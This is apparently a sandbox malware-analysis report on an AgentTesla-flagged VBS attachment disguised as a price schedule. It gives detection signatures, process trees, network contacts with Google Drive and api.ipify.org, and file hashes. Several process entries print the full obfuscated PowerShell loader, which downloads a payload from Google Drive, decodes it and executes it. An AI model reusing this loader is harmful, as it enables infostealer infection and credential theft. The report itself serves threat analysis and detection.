Analysis Overview
SHA256
841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113
Threat Level: Known bad
The file RFQINL21052024_PRICE SCHEDULE.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 03:42
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win10v2004-20240508-en
Max time kernel
144s
Max time network
140s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 404 set thread context of 2484 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
memory/916-0-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp
memory/916-1-0x0000024137150000-0x0000024137172000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x341cxg3.ega.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/916-11-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/916-12-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/404-15-0x0000000003030000-0x0000000003066000-memory.dmp
memory/404-16-0x0000000005AC0000-0x00000000060E8000-memory.dmp
memory/404-17-0x0000000005A90000-0x0000000005AB2000-memory.dmp
memory/404-18-0x0000000006220000-0x0000000006286000-memory.dmp
memory/404-19-0x0000000006300000-0x0000000006366000-memory.dmp
memory/404-29-0x0000000006370000-0x00000000066C4000-memory.dmp
memory/404-30-0x0000000006930000-0x000000000694E000-memory.dmp
memory/404-31-0x0000000006960000-0x00000000069AC000-memory.dmp
memory/404-32-0x0000000007F90000-0x000000000860A000-memory.dmp
memory/404-33-0x0000000006EB0000-0x0000000006ECA000-memory.dmp
memory/404-34-0x0000000007BD0000-0x0000000007C66000-memory.dmp
memory/404-35-0x0000000007B60000-0x0000000007B82000-memory.dmp
memory/404-36-0x0000000008BC0000-0x0000000009164000-memory.dmp
C:\Users\Admin\AppData\Roaming\Vigesimation.Sor
| MD5 | 3d5345e787f5607ceeab0031c358f539 |
| SHA1 | 19dc82bb214aa4cedc883e99d3d29b196d83a330 |
| SHA256 | dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2 |
| SHA512 | 8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f |
memory/404-38-0x0000000009170000-0x000000000C2CC000-memory.dmp
memory/916-40-0x00007FFEC3B23000-0x00007FFEC3B25000-memory.dmp
memory/916-41-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/2484-54-0x0000000001270000-0x00000000024C4000-memory.dmp
memory/2484-55-0x0000000001270000-0x00000000012B2000-memory.dmp
memory/916-58-0x00007FFEC3B20000-0x00007FFEC45E1000-memory.dmp
memory/2484-59-0x0000000023A90000-0x0000000023AE0000-memory.dmp
memory/2484-60-0x0000000023B80000-0x0000000023C12000-memory.dmp
memory/2484-61-0x0000000023A80000-0x0000000023A8A000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 03:42
Reported
2024-05-21 03:44
Platform
win7-20231129-en
Max time kernel
140s
Max time network
146s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2200 set thread context of 2716 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o 